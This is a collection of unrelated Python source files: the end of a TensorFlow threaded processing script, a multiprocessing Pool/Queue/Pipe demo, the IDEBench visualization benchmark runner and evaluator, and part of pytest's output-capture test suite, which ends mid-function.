global edge_pool
edge_pool = multiprocessing.Pool(a.workers)
if a.workers == 1:
with tf.Session() as sess:
for src_path, dst_path in zip(src_paths, dst_paths):
print("processing {}".format(src_path))
process(src_path, dst_path)
complete()
else:
queue = tf.train.input_producer(zip(src_paths, dst_paths), shuffle=False, num_epochs=1)
dequeue_op = queue.dequeue()
def worker(coord):
with sess.as_default():
while not coord.should_stop():
try:
src_path, dst_path = sess.run(dequeue_op)
except tf.errors.OutOfRangeError:
coord.request_stop()
break
process(src_path, dst_path)
complete()
# init epoch counter for the queue
local_init_op = tf.local_variables_initializer()
with tf.Session() as sess:
sess.run(local_init_op)
coord = tf.train.Coordinator()
threads = tf.train.start_queue_runners(coord=coord)
for i in range(a.workers):
t = threading.Thread(target=worker, args=(coord,))
t.start()
threads.append(t)
try:
coord.join(threads)
except KeyboardInterrupt:
coord.request_stop()
coord.join(threads)
main()
|
pool_multiprocessing.py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
from multiprocessing import Pool, Process, Queue, Pipe # Queue 线程安全
# from multiprocessing.dummy import Pool, Process, Queue, Pipe # thread
from time import sleep
import threading
def f(x):
# print(threading.currentThread().getName(), threading.currentThread().ident)
sleep(0.1)
return x*x
def f1(q):
q.put([42, None, 'Queue'])
def f2(conn):
conn.send([43, None, 'Pipe'])
conn.close()
if __name__ == '__main__':
# Queue 通信
q = Queue()
p = Process(target=f1, args=(q,))
p.start()
print(q.get()) # prints "[42, None, 'Queue']"
p.join()
# Pipe通信
parent_conn, child_conn = Pipe()
p = Process(target=f2, args=(child_conn,))
p.start()
print(parent_conn.recv()) # prints "[43, None, 'Pipe']"
p.join()
# thread pool
# start 4 worker processes/threads
with Pool(processes=4) as pool:
# print "[0, 1, 4,..., 81]"
print(pool.map(f, range(10)))
# print same numbers in arbitrary order
# for i in pool.imap_unordered(f, range(10)):
# print(i)
print(list(pool.imap_unordered(f, range(10))))
# evaluate "f(10)" asynchronously
res = pool.apply_async(f, [10])
print(res.get(timeout=1)) # prints "100"
# make worker sleep for 10 secs
res = pool.apply_async(sleep, [10])
# raises multiprocessing.TimeoutError
print(res.get(timeout=1))
# exiting the 'with'-block has stopped the pool
'''
同步或异步执行多进程/线程任务
ref:
https://docs.python.org/3/library/multiprocessing.html
'''
|
idebench.py
|
import importlib
import json
import csv
import time
import hashlib
import multiprocessing
import statistics
import numpy as np
import os
from common.schema import Schema
from common.vizgraph import VizGraph
from common.vizrequest import VizRequest
from common.operation import Operation
from optparse import OptionParser
from scipy import spatial
import glob
from os.path import basename
class IDEBench:
result_queue = multiprocessing.Queue()
def __init__(self):
parser = OptionParser()
parser.add_option("--driver-name", dest="driver_name", action="store", help="Driver name")
parser.add_option("--driver-create-storage", dest="driver_create_storage", action="store_true", help="Calls create_storage on driver", default=False)
parser.add_option("--driver-clear-storage", dest="driver_clear_storage", action="store_true", help="Calls clear_storage on driver", default=False)
parser.add_option("--driver-clear-cache", dest="driver_clear_cache", action="store_true", help="Calls clear_cache on driver", default=False)
parser.add_option("--driver-args", dest="driver_args", action="store", help="Arguments to pass to the driver", default="")
parser.add_option("--settings-normalized", dest="settings_normalized", action="store_true", help="Whether joins should be used", default=False)
parser.add_option("--settings-dataset", dest="settings_dataset", action="store", help="Name of the dataset")
parser.add_option("--settings-size", dest="settings_size", default="", action="store", help="Number of rows in the dataset")
parser.add_option("--settings-thinktime", dest="settings_thinktime", type="int", action="store", help="Think-time in seconds between two executions", default=1000)
parser.add_option("--settings-time-requirement", dest="settings_time_requirement", action="store", help="The Time requirement to be used", default=1000)
parser.add_option("--settings-confidence-level", dest="settings_confidence_level", action="store", help="The confidence level to be used", default=95)
parser.add_option("--settings-workflow", dest="settings_workflow", action="store", help="The workflow file to be used")
parser.add_option("--evaluate", dest="evaluate", action="store_true", help="Size of the dataset in MB", default=False)
parser.add_option("--create--full-report", dest="create_report", action="store_true", help="Merges all reports in the reports directory into a single file", default=False)
parser.add_option("--run", dest="run", action="store_true", help="Flag to run the benchmark without config file", default=False)
parser.add_option("--run-config", dest="config", action="store", help="Flag to run the benchmark with the specified config file")
parser.add_option("--groundtruth", dest="groundtruth", action="store_true", help="If set computes the ground-truth for the specified workflow", default=False)
parser.add_option("--viz_n", dest="viz_number", action="store", type=int, help="Number of visualization", default=4)
(self.options, args) = parser.parse_args()
if not self.options.config:
if self.options.create_report:
self.create_report()
return
if not self.options.driver_name:
parser.error("No driver name specified.")
if not self.options.settings_dataset:
parser.error("No dataset specified.")
if not self.options.settings_size:
print("Warning: No dataset size specified.")
if self.options.groundtruth or self.options.run:
self.setup()
if self.options.groundtruth:
self.options.think_time = 1
self.options.time_requirement = 999999
workflow_files = glob.glob("data/" + self.options.settings_dataset + "/workflows/*.json")
for workflow_file in workflow_files:
self.options.settings_workflow = basename(workflow_file).split(".")[0]
self.run()
elif self.options.run:
if not self.options.settings_workflow:
parser.error("No workflow specified.")
self.run()
elif self.options.evaluate:
self.evaluate(self.get_config_hash())
else:
with open(self.options.config) as f:
config = json.load(f)
assure_path_exists("./results")
for d in config["settings-datasets"]:
assure_path_exists("./data/%s/groundtruths" % d)
# TODO: create pairs instead
for dataset in config["settings-datasets"]:
self.options.settings_dataset = dataset
for driver_name in config["driver-names"]:
for driver_arg in config["driver-args"]:
self.options.driver_name = driver_name
self.setup(driver_arg)
for size in config["settings-sizes"]:
for workflow in config["settings-workflows"]:
for thinktime in config["settings-thinktimes"]:
for time_requirement in config["settings-time-requirements"]:
for confidence_level in config["settings-confidence-levels"]:
self.options.driver_name = driver_name
self.options.settings_size = size
self.options.settings_workflow = workflow
self.options.settings_thinktime = thinktime
self.options.settings_time_requirement = time_requirement
self.options.settings_confidence_level = confidence_level
self.options.settings_normalized = config["settings-normalized"]
self.options.groundtruth = config["groundtruth"] if "groundtruth" in config else False
self.options.run = config["run"] if "run" in config else True
self.options.evaluate = config["evaluate"] if "evaluate" in config else True
if self.options.run:
self.run()
if self.options.evaluate:
self.evaluate(self.get_config_hash())
def setup(self, driver_arg = None):
with open(self.get_schema_path()) as f:
self.schema = Schema(json.load(f), self.options.settings_normalized)
module = importlib.import_module("drivers." + self.options.driver_name)
self.driver = getattr(module, "IDEBenchDriver")()
try:
self.driver.init(self.options, self.schema, driver_arg)
except AttributeError:
pass
def run(self):
try:
self.driver.workflow_start()
except AttributeError:
pass
with open(self.get_workflow_path()) as f:
self.workflow_interactions = json.load(f)["interactions"]
self.vizgraph = VizGraph(self.options.viz_number)
self.operation_results = { "args": vars(self.options), "results": {} }
self.current_interaction_index = 0
self.current_vizrequest_index = 0
self.process_interaction(0)
def end_run(self):
try:
self.driver.workflow_end()
except AttributeError:
pass
path = "results/%s.json" % (self.get_config_hash())
if not self.options.groundtruth:
with open(path, "w") as fp:
json.dump(self.operation_results, fp, indent=4)
if self.options.groundtruth:
path = "data/%s/groundtruths/%s_%s.json" % (self.options.settings_dataset, self.options.settings_size, self.options.settings_workflow)
with open(path, "w") as fp:
json.dump(self.operation_results, fp, indent=4)
def process_interaction(self, interaction_index):
print("processing!")
if interaction_index < 0 or interaction_index >= len(self.workflow_interactions):
print("reached end of interactions")
self.end_run()
return
print("thinking...")
time.sleep(self.options.settings_thinktime / 1000)
interaction = self.workflow_interactions[interaction_index]
vizs_to_request = self.vizgraph.apply_interaction(Operation(interaction))
viz_requests = []
for viz in vizs_to_request:
viz_requests.append(VizRequest(self.current_vizrequest_index, self.current_interaction_index, viz))
self.current_vizrequest_index += 1
#if interaction_index == 0:
# self.result_queue = multiprocessing.Queue()
# TODO: document this feature
try:
self.driver.before_requests(self.options, self.schema, IDEBench.result_queue)
except AttributeError:
pass
procs = []
nprocs = len(viz_requests)
if hasattr(self.driver, "use_single_process") and self.driver.use_single_process:
for viz_request in viz_requests:
self.driver.process_request(viz_request, self.options, self.schema, IDEBench.result_queue)
else:
for viz_request in viz_requests:
proc = multiprocessing.Process(target=self.driver.process_request, args=(viz_request, self.options, self.schema, IDEBench.result_queue))
procs.append(proc)
proc.start()
resultlist = []
for i in range(nprocs):
resultlist.append(IDEBench.result_queue.get())
for proc in procs:
proc.join()
self.deliver_viz_request(resultlist)
self.current_interaction_index += 1
self.process_interaction(self.current_interaction_index)
def deliver_viz_request(self, viz_requests):
for viz_request in viz_requests:
if len(viz_request.result.keys()) == 0:
pass
operation_result = {}
operation_result["id"] = viz_request.operation_id
operation_result["sql"] = viz_request.viz.get_computed_filter_as_sql(self.schema)
operation_result["viz_name"] = viz_request.viz.name
operation_result["parent_operation_id"] = viz_request.parent_operation_id
operation_result["start_time"] = viz_request.start_time
operation_result["end_time"] = viz_request.end_time
operation_result["time_violated"] = viz_request.timedout
operation_result["t_pause"] = viz_request.t_pause
operation_result["t_start"] = viz_request.t_start
operation_result["progress"] = viz_request.progress
operation_result["output"] = viz_request.result
operation_result["margins"] = viz_request.margins
operation_result["num_binning_dimensions"] = len(viz_request.viz.binning)
operation_result["num_aggregates_per_bin"] = len(viz_request.viz.per_bin_aggregates)
bin_types = []
for viz_bin in viz_request.viz.binning:
if "width" in viz_bin:
bin_types.append("quantitative")
else:
bin_types.append("nominal")
operation_result["binning_type"] = "_".join(sorted(bin_types))
agg_types = []
for viz_agg in viz_request.viz.per_bin_aggregates:
if viz_agg["type"] == "count":
agg_types.append("count")
elif viz_agg["type"] == "avg":
agg_types.append("avg")
else:
raise Exception()
operation_result["aggregate_type"] = "_".join(sorted(agg_types))
if not viz_request.operation_id in self.operation_results:
self.operation_results["results"][viz_request.operation_id] = operation_result
viz_request.delivered = True
#self.driver.request_vizs(self.viz_requests)
def get_config_hash(self):
o = self.options
h = (o.driver_name, o.settings_dataset, o.settings_workflow, o.settings_size, o.settings_normalized, o.settings_confidence_level, o.settings_thinktime, o.settings_thinktime, o.settings_time_requirement)
return hashlib.md5(str(h).encode('utf-8')).hexdigest()
def get_schema_path(self):
return "data/%s/sample.json" % (self.options.settings_dataset)
def get_workflow_path(self):
return "data/%s/workflows/%s.json" % (self.options.settings_dataset, self.options.settings_workflow)
def compute_viz_similarity(self, viz_gt, viz):
if len(viz.keys()) == 0 and len(viz_gt.keys()) == 0:
return 1
if len(viz_gt.keys()) == 0 and len(viz.keys()) > 0:
raise Exception()
if len(viz_gt.keys()) > 0 and len(viz.keys()) == 0:
return 0
for gt_key in viz_gt.keys():
if gt_key not in viz:
viz[gt_key] = 0
viz_gt_vals = []
viz_vals = []
for gt_key in viz_gt.keys():
if isinstance(viz_gt[gt_key], list):
viz_gt_vals.append(viz_gt[gt_key][0])
else:
viz_gt_vals.append(viz_gt[gt_key])
if isinstance(viz[gt_key], list):
viz_vals.append(viz[gt_key][0])
else:
viz_vals.append(viz[gt_key])
viz_gt_vals = np.array(viz_gt_vals).astype(float)
viz_vals = np.array(viz_vals).astype(float)
#viz_gt_vals = self.normalize(viz_gt_vals)
#viz_vals = self.normalize(viz_vals)
if np.isnan(viz_gt_vals).any():
raise Exception()
if np.isnan(viz_vals).any():
raise Exception()
#score = np.dot(viz_gt_vals, viz_vals)/ ( np.sqrt(np.sum(np.square(viz_gt_vals))) * np.sqrt(np.sum(np.square(viz_vals))) )
np.seterr(all='raise')
try:
score = 1 - spatial.distance.cosine(viz_gt_vals, viz_vals)
except:
return 0
return score if not np.isnan(score) else 0
def normalize(self, v):
norm=np.linalg.norm(v, ord=1)
if norm==0:
norm=np.finfo(v.dtype).eps
return v/norm
def evaluate(self, config_hash):
print("evaluate")
result_json = None
try:
with open("results/%s.json" % config_hash, "r") as json_data:
result_json = json.load(json_data)
except:
print("couldn't load file %s" % ("results/%s.json" % config_hash))
return
workflow = result_json["args"]["settings_workflow"]
dataset = result_json["args"]["settings_dataset"]
size = result_json["args"]["settings_size"]
time_requirement = result_json["args"]["settings_time_requirement"]
with open("data/%s/groundtruths/%s_%s.json" % (dataset, size, workflow), "r") as json_data:
groundtruths = json.load(json_data)["results"]
with open("reports/%s.csv" % config_hash, 'w') as fp:
w = csv.DictWriter(fp, [
"operation_id",
"config_hash",
"interaction_id",
"dataset",
"size",
"viz_name",
"interface",
"think_time",
"time_requirement",
"t_start",
"t_pause",
"workflow",
"start_time",
"end_time",
"duration",
"progress",
"time_violated",
"num_binning_dimensions",
"binning_type",
"has_invalid_bins",
"num_bins_out_of_margin",
"num_bins_delivered",
"num_bins_in_gt",
"missing_bins",
"dissimilarity",
"num_aggregates_per_bin",
"aggregate_type",
"bias",
"rel_error_avg",
"rel_error_stdev",
"rel_error_min",
"rel_error_max",
"margin_avg",
"margin_stdev",
"margin_min",
"margin_max",
"margin_ratio"], delimiter=",", lineterminator="\n")
w.writeheader()
operations = result_json["results"]
for op_number in operations.keys():
gt_output = groundtruths[op_number]["output"]
operation = operations[op_number]
margins = []
rel_errors = []
forecast_values = []
actual_values = []
out_of_margin_count = 0
for gt_bin_identifier, gt_aggregate_results in gt_output.items():
if gt_bin_identifier in operation["output"]:
for agg_bin_result_index, agg_bin_result in enumerate(operation["output"][gt_bin_identifier]):
rel_error = None
op_result = operation["output"][gt_bin_identifier][agg_bin_result_index]
gt_result = gt_aggregate_results[agg_bin_result_index]
if abs(gt_result) > 0:
rel_error = abs(op_result - gt_result)/abs(gt_result)
if rel_error > 1e-5:
pass
rel_errors.append(rel_error)
else:
print("ignoring zero in groundtruth")
forecast_values.append(op_result)
actual_values.append(gt_result)
if operation["margins"] and gt_bin_identifier in operation["margins"]:
op_margin = float(operation["margins"][gt_bin_identifier][agg_bin_result_index])
if np.isnan(op_margin) or np.isinf(op_margin) or abs(op_margin) > 1000000:
if os.path.exists("./margin_errors"):
append_write = 'a' # append if already exists
else:
append_write = 'w' # make a new file if not
with open("./margin_errors", append_write) as ffff:
ffff.writelines(self.options.settings_workflow + "\n" + str(operation["margins"][gt_bin_identifier][agg_bin_result_index]) + "\n")
elif gt_result + 1e-6 < op_result - abs(op_result * op_margin) or gt_result - 1e-6 > op_result + abs(op_result * op_margin):
out_of_margin_count += 1
margins.append(abs(op_margin))
else:
margins.append(abs(op_margin))
else:
pass
# add error as many times as a bin was expected!
#rel_errors.extend( [ 1 for n in range(len(gt_aggregate_results)) ] )
# invalid bins test
has_invalid_bins = False
num_invalid = 0
inv = []
for kk in operation["output"].keys():
if kk not in gt_output:
has_invalid_bins = True
num_invalid += 1
inv.append(kk)
print(self.options.settings_workflow)
print(str(operation["id"]))
print("invalid key:" + kk)
print(operation["sql"])
print(operation["output"])
os._exit(0)
args = result_json["args"]
missing_bins = 1 - len(operation["output"].keys()) / len(gt_output.keys()) if len(gt_output.keys()) > 0 else 0
op_eval_result = {}
op_eval_result["operation_id"] = operation["id"]
op_eval_result["config_hash"] = self.get_config_hash()
op_eval_result["interaction_id"] = operation["parent_operation_id"]
op_eval_result["dataset"] = args["settings_dataset"]
op_eval_result["size"] = args["settings_size"]
op_eval_result["viz_name"] = operation["viz_name"]
op_eval_result["think_time"] = args["settings_thinktime"]
op_eval_result["time_requirement"] = args["settings_time_requirement"]
op_eval_result["interface"] = args["driver_name"]
op_eval_result["workflow"] = args["settings_workflow"]
op_eval_result["start_time"] = operation["start_time"]
op_eval_result["end_time"] = operation["end_time"]
op_eval_result["t_pause"] = operation["t_pause"] if "t_pause" in operation else 0
op_eval_result["t_start"] = operation["t_start"] if "t_start" in operation else 0
op_eval_result["duration"] = operation["end_time"] - operation["start_time"]
if "time_violated" in operation:
op_eval_result["time_violated"] = operation["time_violated"]
elif "timedout" in operation:
op_eval_result["time_violated"] = operation["timedout"]
else:
raise Exception()
op_eval_result["has_invalid_bins"] = has_invalid_bins
op_eval_result["binning_type"] = operation["binning_type"]
op_eval_result["aggregate_type"] = operation["aggregate_type"]
op_eval_result["num_bins_delivered"] = len(operation["output"].keys())
op_eval_result["num_bins_in_gt"] = len(gt_output.items())
op_eval_result["missing_bins"] = "%.5f" % missing_bins
op_eval_result["dissimilarity"] = "%.5f" % (1- self.compute_viz_similarity(gt_output, operation["output"]))
op_eval_result["num_bins_out_of_margin"] = "%i" % out_of_margin_count
op_eval_result["num_aggregates_per_bin"] = operation["num_aggregates_per_bin"]
op_eval_result["num_binning_dimensions"] = operation["num_binning_dimensions"]
op_eval_result["progress"] = "%.5f" % operation["progress"]
op_eval_result["bias"] = "%.5f" % (sum(forecast_values) / sum(actual_values) - 1)if len(actual_values) > 0 else 0
op_eval_result["rel_error_stdev"] = "%.5f" % statistics.stdev(rel_errors) if len(rel_errors) > 1 else 0.0
op_eval_result["rel_error_min"] = "%.5f" % min(rel_errors) if len(rel_errors) > 0 else 0
op_eval_result["rel_error_max"] = "%.5f" % max(rel_errors) if len(rel_errors) > 0 else 0
op_eval_result["rel_error_avg"] = "%.5f" % float(sum(rel_errors) / float(len(rel_errors))) if len(rel_errors) > 0 else 0
op_eval_result["margin_stdev"] = "%.5f" % statistics.stdev(margins) if len(margins) > 1 else 0.0
op_eval_result["margin_min"] = "%.5f" % min(margins) if len(margins) > 0 else 0.0
op_eval_result["margin_max"] = "%.5f" % max(margins) if len(margins) > 0 else 0.0
op_eval_result["margin_avg"] = "%.5f" % float(sum(margins) / float(len(margins))) if len(margins) > 0 else 0.0
op_eval_result["margin_ratio"] = "%.5f" % float(len(operation["margins"]) / len(operation["output"])) if operation["margins"] and len(operation["output"]) > 0 else 1
w.writerow(op_eval_result)
def create_report(self):
header_saved = False
interesting_files = glob.glob("reports/*.csv")
with open('./full_report.csv','w') as fout:
for filename in interesting_files:
print(filename)
with open(filename) as fin:
header = next(fin)
if not header_saved:
print(header)
fout.write(header)
header_saved = True
for line in fin:
fout.write(line)
print("saved report")
def assure_path_exists(path):
d = os.path.dirname(path)
if not os.path.exists(d):
os.makedirs(d)
if __name__ == '__main__':
IDEBench()
|
test_capture.py
|
import contextlib
import io
import os
import subprocess
import sys
import textwrap
from io import UnsupportedOperation
from typing import BinaryIO
from typing import Generator
import pytest
from _pytest import capture
from _pytest.capture import _get_multicapture
from _pytest.capture import CaptureManager
from _pytest.capture import MultiCapture
from _pytest.config import ExitCode
# note: py.io capture tests where copied from
# pylib 1.4.20.dev2 (rev 13d9af95547e)
def StdCaptureFD(out=True, err=True, in_=True):
return capture.MultiCapture(out, err, in_, Capture=capture.FDCapture)
def StdCapture(out=True, err=True, in_=True):
return capture.MultiCapture(out, err, in_, Capture=capture.SysCapture)
def TeeStdCapture(out=True, err=True, in_=True):
return capture.MultiCapture(out, err, in_, Capture=capture.TeeSysCapture)
class TestCaptureManager:
@pytest.mark.parametrize("method", ["no", "sys", "fd"])
def test_capturing_basic_api(self, method):
capouter = StdCaptureFD()
old = sys.stdout, sys.stderr, sys.stdin
try:
capman = CaptureManager(method)
capman.start_global_capturing()
capman.suspend_global_capture()
outerr = capman.read_global_capture()
assert outerr == ("", "")
capman.suspend_global_capture()
outerr = capman.read_global_capture()
assert outerr == ("", "")
print("hello")
capman.suspend_global_capture()
out, err = capman.read_global_capture()
if method == "no":
assert old == (sys.stdout, sys.stderr, sys.stdin)
else:
assert not out
capman.resume_global_capture()
print("hello")
capman.suspend_global_capture()
out, err = capman.read_global_capture()
if method != "no":
assert out == "hello\n"
capman.stop_global_capturing()
finally:
capouter.stop_capturing()
def test_init_capturing(self):
capouter = StdCaptureFD()
try:
capman = CaptureManager("fd")
capman.start_global_capturing()
pytest.raises(AssertionError, capman.start_global_capturing)
capman.stop_global_capturing()
finally:
capouter.stop_capturing()
@pytest.mark.parametrize("method", ["fd", "sys"])
def test_capturing_unicode(testdir, method):
obj = "'b\u00f6y'"
testdir.makepyfile(
"""\
# taken from issue 227 from nosetests
def test_unicode():
import sys
print(sys.stdout)
print(%s)
"""
% obj
)
result = testdir.runpytest("--capture=%s" % method)
result.stdout.fnmatch_lines(["*1 passed*"])
@pytest.mark.parametrize("method", ["fd", "sys"])
def test_capturing_bytes_in_utf8_encoding(testdir, method):
testdir.makepyfile(
"""\
def test_unicode():
print('b\\u00f6y')
"""
)
result = testdir.runpytest("--capture=%s" % method)
result.stdout.fnmatch_lines(["*1 passed*"])
def test_collect_capturing(testdir):
p = testdir.makepyfile(
"""
import sys
print("collect %s failure" % 13)
sys.stderr.write("collect %s_stderr failure" % 13)
import xyz42123
"""
)
result = testdir.runpytest(p)
result.stdout.fnmatch_lines(
[
"*Captured stdout*",
"collect 13 failure",
"*Captured stderr*",
"collect 13_stderr failure",
]
)
class TestPerTestCapturing:
def test_capture_and_fixtures(self, testdir):
p = testdir.makepyfile(
"""
def setup_module(mod):
print("setup module")
def setup_function(function):
print("setup " + function.__name__)
def test_func1():
print("in func1")
assert 0
def test_func2():
print("in func2")
assert 0
"""
)
result = testdir.runpytest(p)
result.stdout.fnmatch_lines(
[
"setup module*",
"setup test_func1*",
"in func1*",
"setup test_func2*",
"in func2*",
]
)
@pytest.mark.xfail(reason="unimplemented feature")
def test_capture_scope_cache(self, testdir):
p = testdir.makepyfile(
"""
import sys
def setup_module(func):
print("module-setup")
def setup_function(func):
print("function-setup")
def test_func():
print("in function")
assert 0
def teardown_function(func):
print("in teardown")
"""
)
result = testdir.runpytest(p)
result.stdout.fnmatch_lines(
[
"*test_func():*",
"*Captured stdout during setup*",
"module-setup*",
"function-setup*",
"*Captured stdout*",
"in teardown*",
]
)
def test_no_carry_over(self, testdir):
p = testdir.makepyfile(
"""
def test_func1():
print("in func1")
def test_func2():
print("in func2")
assert 0
"""
)
result = testdir.runpytest(p)
s = result.stdout.str()
assert "in func1" not in s
assert "in func2" in s
def test_teardown_capturing(self, testdir):
p = testdir.makepyfile(
"""
def setup_function(function):
print("setup func1")
def teardown_function(function):
print("teardown func1")
assert 0
def test_func1():
print("in func1")
pass
"""
)
result = testdir.runpytest(p)
result.stdout.fnmatch_lines(
[
"*teardown_function*",
"*Captured stdout*",
"setup func1*",
"in func1*",
"teardown func1*",
# "*1 fixture failure*"
]
)
def test_teardown_capturing_final(self, testdir):
p = testdir.makepyfile(
"""
def teardown_module(mod):
print("teardown module")
assert 0
def test_func():
pass
"""
)
result = testdir.runpytest(p)
result.stdout.fnmatch_lines(
[
"*def teardown_module(mod):*",
"*Captured stdout*",
"*teardown module*",
"*1 error*",
]
)
def test_capturing_outerr(self, testdir):
p1 = testdir.makepyfile(
"""\
import sys
def test_capturing():
print(42)
sys.stderr.write(str(23))
def test_capturing_error():
print(1)
sys.stderr.write(str(2))
raise ValueError
"""
)
result = testdir.runpytest(p1)
result.stdout.fnmatch_lines(
[
"*test_capturing_outerr.py .F*",
"====* FAILURES *====",
"____*____",
"*test_capturing_outerr.py:8: ValueError",
"*--- Captured stdout *call*",
"1",
"*--- Captured stderr *call*",
"2",
]
)
class TestLoggingInteraction:
def test_logging_stream_ownership(self, testdir):
p = testdir.makepyfile(
"""\
def test_logging():
import logging
import pytest
stream = capture.CaptureIO()
logging.basicConfig(stream=stream)
stream.close() # to free memory/release resources
"""
)
result = testdir.runpytest_subprocess(p)
assert result.stderr.str().find("atexit") == -1
def test_logging_and_immediate_setupteardown(self, testdir):
p = testdir.makepyfile(
"""\
import logging
def setup_function(function):
logging.warning("hello1")
def test_logging():
logging.warning("hello2")
assert 0
def teardown_function(function):
logging.warning("hello3")
assert 0
"""
)
for optargs in (("--capture=sys",), ("--capture=fd",)):
print(optargs)
result = testdir.runpytest_subprocess(p, *optargs)
s = result.stdout.str()
result.stdout.fnmatch_lines(
["*WARN*hello3", "*WARN*hello1", "*WARN*hello2"] # errors show first!
)
# verify proper termination
assert "closed" not in s
def test_logging_and_crossscope_fixtures(self, testdir):
p = testdir.makepyfile(
"""\
import logging
def setup_module(function):
logging.warning("hello1")
def test_logging():
logging.warning("hello2")
assert 0
def teardown_module(function):
logging.warning("hello3")
assert 0
"""
)
for optargs in (("--capture=sys",), ("--capture=fd",)):
print(optargs)
result = testdir.runpytest_subprocess(p, *optargs)
s = result.stdout.str()
result.stdout.fnmatch_lines(
["*WARN*hello3", "*WARN*hello1", "*WARN*hello2"] # errors come first
)
# verify proper termination
assert "closed" not in s
def test_conftestlogging_is_shown(self, testdir):
testdir.makeconftest(
"""\
import logging
logging.basicConfig()
logging.warning("hello435")
"""
)
# make sure that logging is still captured in tests
result = testdir.runpytest_subprocess("-s", "-p", "no:capturelog")
assert result.ret == ExitCode.NO_TESTS_COLLECTED
result.stderr.fnmatch_lines(["WARNING*hello435*"])
assert "operation on closed file" not in result.stderr.str()
def test_conftestlogging_and_test_logging(self, testdir):
testdir.makeconftest(
"""\
import logging
logging.basicConfig()
"""
)
# make sure that logging is still captured in tests
p = testdir.makepyfile(
"""\
def test_hello():
import logging
logging.warning("hello433")
assert 0
"""
)
result = testdir.runpytest_subprocess(p, "-p", "no:capturelog")
assert result.ret != 0
result.stdout.fnmatch_lines(["WARNING*hello433*"])
assert "something" not in result.stderr.str()
assert "operation on closed file" not in result.stderr.str()
def test_logging_after_cap_stopped(self, testdir):
testdir.makeconftest(
"""\
import pytest
import logging
log = logging.getLogger(__name__)
@pytest.fixture
def log_on_teardown():
yield
log.warning('Logging on teardown')
"""
)
# make sure that logging is still captured in tests
p = testdir.makepyfile(
"""\
def test_hello(log_on_teardown):
import logging
logging.warning("hello433")
assert 1
raise KeyboardInterrupt()
"""
)
result = testdir.runpytest_subprocess(p, "--log-cli-level", "info")
assert result.ret != 0
result.stdout.fnmatch_lines(
["*WARNING*hello433*", "*WARNING*Logging on teardown*"]
)
assert (
"AttributeError: 'NoneType' object has no attribute 'resume_capturing'"
not in result.stderr.str()
)
class TestCaptureFixture:
@pytest.mark.parametrize("opt", [[], ["-s"]])
def test_std_functional(self, testdir, opt):
reprec = testdir.inline_runsource(
"""\
def test_hello(capsys):
print(42)
out, err = capsys.readouterr()
assert out.startswith("42")
""",
*opt,
)
reprec.assertoutcome(passed=1)
def test_capsyscapfd(self, testdir):
p = testdir.makepyfile(
"""\
def test_one(capsys, capfd):
pass
def test_two(capfd, capsys):
pass
"""
)
result = testdir.runpytest(p)
result.stdout.fnmatch_lines(
[
"*ERROR*setup*test_one*",
"E*capfd*capsys*same*time*",
"*ERROR*setup*test_two*",
"E*capsys*capfd*same*time*",
"*2 errors*",
]
)
def test_capturing_getfixturevalue(self, testdir):
"""Test that asking for "capfd" and "capsys" using request.getfixturevalue
in the same test is an error.
"""
testdir.makepyfile(
"""\
def test_one(capsys, request):
request.getfixturevalue("capfd")
def test_two(capfd, request):
request.getfixturevalue("capsys")
"""
)
result = testdir.runpytest()
result.stdout.fnmatch_lines(
[
"*test_one*",
"E * cannot use capfd and capsys at the same time",
"*test_two*",
"E * cannot use capsys and capfd at the same time",
"*2 failed in*",
]
)
def test_capsyscapfdbinary(self, testdir):
p = testdir.makepyfile(
"""\
def test_one(capsys, capfdbinary):
pass
"""
)
result = testdir.runpytest(p)
result.stdout.fnmatch_lines(
["*ERROR*setup*test_one*", "E*capfdbinary*capsys*same*time*", "*1 error*"]
)
@pytest.mark.parametrize("method", ["sys", "fd"])
def test_capture_is_represented_on_failure_issue128(self, testdir, method):
p = testdir.makepyfile(
"""\
def test_hello(cap{}):
print("xxx42xxx")
assert 0
""".format(
method
)
)
result = testdir.runpytest(p)
result.stdout.fnmatch_lines(["xxx42xxx"])
def test_stdfd_functional(self, testdir):
reprec = testdir.inline_runsource(
"""\
def test_hello(capfd):
import os
os.write(1, b"42")
out, err = capfd.readouterr()
assert out.startswith("42")
capfd.close()
"""
)
reprec.assertoutcome(passed=1)
def test_capfdbinary(self, testdir):
reprec = testdir.inline_runsource(
"""\
def test_hello(capfdbinary):
import os
# some likely un-decodable bytes
os.write(1, b'\\xfe\\x98\\x20')
out, err = capfdbinary.readouterr()
assert out == b'\\xfe\\x98\\x20'
assert err == b''
"""
)
reprec.assertoutcome(passed=1)
def test_capsysbinary(self, testdir):
p1 = testdir.makepyfile(
r"""
def test_hello(capsysbinary):
import sys
sys.stdout.buffer.write(b'hello')
# Some likely un-decodable bytes.
sys.stdout.buffer.write(b'\xfe\x98\x20')
sys.stdout.buffer.flush()
# Ensure writing in text mode still works and is captured.
# https://github.com/pytest-dev/pytest/issues/6871
print("world", flush=True)
out, err = capsysbinary.readouterr()
assert out == b'hello\xfe\x98\x20world\n'
assert err == b''
print("stdout after")
print("stderr after", file=sys.stderr)
"""
)
result = testdir.runpytest(str(p1), "-rA")
result.stdout.fnmatch_lines(
[
"*- Captured stdout call -*",
"stdout after",
"*- Captured stderr call -*",
"stderr after",
"*= 1 passed in *",
]
)
def test_partial_setup_failure(self, testdir):
p = testdir.makepyfile(
"""\
def test_hello(capsys, missingarg):
pass
"""
)
result = testdir.runpytest(p)
result.stdout.fnmatch_lines(["*test_partial_setup_failure*", "*1 error*"])
def test_keyboardinterrupt_disables_capturing(self, testdir):
p = testdir.makepyfile(
"""\
def test_hello(capfd):
import os
os.write(1, b'42')
raise KeyboardInterrupt()
"""
)
result = testdir.runpytest_subprocess(p)
result.stdout.fnmatch_lines(["*KeyboardInterrupt*"])
assert result.ret == 2
def test_capture_and_logging(self, testdir):
"""#14"""
p = testdir.makepyfile(
"""\
import logging
def test_log(capsys):
logging.error('x')
"""
)
result = testdir.runpytest_subprocess(p)
assert "closed" not in result.stderr.str()
@pytest.mark.parametrize("fixture", ["capsys", "capfd"])
@pytest.mark.parametrize("no_capture", [True, False])
def test_disabled_capture_fixture(self, testdir, fixture, no_capture):
testdir.makepyfile(
"""\
def test_disabled({fixture}):
print('captured before')
with {fixture}.disabled():
print('while capture is disabled')
print('captured after')
assert {fixture}.readouterr() == ('captured before\\ncaptured after\\n', '')
def test_normal():
print('test_normal executed')
""".format(
fixture=fixture
)
)
args = ("-s",) if no_capture else ()
result = testdir.runpytest_subprocess(*args)
result.stdout.fnmatch_lines(["*while capture is disabled*", "*= 2 passed in *"])
result.stdout.no_fnmatch_line("*captured before*")
result.stdout.no_fnmatch_line("*captured after*")
if no_capture:
